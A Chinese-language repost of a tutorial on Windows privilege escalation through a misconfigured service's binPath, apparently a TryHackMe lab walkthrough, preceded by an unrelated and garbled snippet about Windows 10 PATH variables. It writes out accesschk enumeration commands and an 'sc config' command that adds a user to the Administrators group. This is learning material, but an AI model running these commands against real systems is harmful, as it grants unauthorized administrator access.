前沿拓展:
win10 path默認
%systemroot%\system框,如果當(dāng)前是以administrator登錄系統(tǒng)的用戶,對話框的上面為administrator的用戶變量,對話框的下面為系統(tǒng)變量(即相當(dāng)于系統(tǒng)中所有用戶的用戶變量)。有的時候我們會看到在用戶變量和系統(tǒng)探視變量中都存在某一個環(huán)境變量,比如path,那么path的值到底是用戶變量中的值還是系統(tǒng)變量中的值,或者兩者都不是呢?**是兩者都不是。path變量的值是用戶變器量中的值與系統(tǒng)變量中的值的疊加。
4.改變環(huán)境變量和環(huán)境變量中的值應(yīng)該注意什么?
環(huán)境變量和環(huán)境變量的值不要含有空格,也不要用中文,切記!
使用 binPath 提升 Windows 權(quán)限
binPath 是一個必需的服務(wù)參數(shù),用于指定服務(wù)二進制文件的路徑。如果任何服務(wù)配置了不正確的權(quán)限并提供對服務(wù)配置的未經(jīng)授權(quán)的訪問,攻擊者可以利用此錯誤配置并通過binPath參數(shù)執(zhí)行任意命令。
如果服務(wù)配置為以提升的權(quán)限運行,攻擊者可以在以普通用戶身份登錄時以管理權(quán)限執(zhí)行任意命令。
攻擊背后的想法是識別以系統(tǒng)或管理權(quán)限運行的服務(wù),并使用錯誤的權(quán)限來配置服務(wù)并通過binPath參數(shù)執(zhí)行任意命令。
Windows 特權(quán)升降架
在演示中,我將使用 TryHackMe 中的一個易受攻擊的機器,名為Windows PrivEsc Arena。
·黑客機器IP – 10.10.249.6
·受害者機器的IP地址是10.10.140.212
·具有權(quán)限的用戶 –用戶
初始訪問
因此,我們可以使用普通用戶user的權(quán)限進行訪問。我們需要通過將用戶用戶添加到管理員組來提升權(quán)限。
具有用戶權(quán)限的受害計算機
我們看到只有TCM用戶是 Administrators 組的成員。
管理員組服務(wù)
第一步是為服務(wù)定義弱權(quán)限。我們可以使用Accesschk工具來查找可以修改的服務(wù)
accesschk64.exe –wvcu Everyone *
(Shows all the services that has write access to Everyone)
–u = Suppress Errors–w = Show only objects that has write access
–v = Verbose
–c = Name as a windows service ( * for all the services)
Accesschk 的智能
daclsvc服務(wù)將SERVICE_CHANGE_CONFIG權(quán)限設(shè)置為每個人。
我們可以使用以下命令查詢服務(wù)以獲取更多信息:
accesschk64.exe –wvcu daclsvc
daclsvc 服務(wù)
sc qc daclsvc
daclsvc 服務(wù)
在上面的屏幕截圖中,您可以看到daclsvc服務(wù)正在以系統(tǒng)權(quán)限運行。讓我們嘗試使用錯誤的配置將用戶用戶添加到管理員組。
開發(fā)
使用以下命令更改daclsvc服務(wù)的 binPath參數(shù):
sc config daclsvc binPath=“net localgroup administrators user /add”
更改 binPath 參數(shù)
我們看到命令執(zhí)行成功。讓我們檢查binPath參數(shù):
sc qc daclsvc
daclsvc 查詢服務(wù)
重新啟動服務(wù)后,用戶user將被添加到管理員組中。
服務(wù)開始
結(jié)論
我向您展示了如何使用 binPath 參數(shù)在 Windows 上提升權(quán)限。為了防止攻擊,您必須防止未經(jīng)授權(quán)的管理員對服務(wù)進行更改。
拓展知識:
原創(chuàng)文章,作者:九賢生活小編,如若轉(zhuǎn)載,請注明出處:http://m.xiesong.cn/123903.html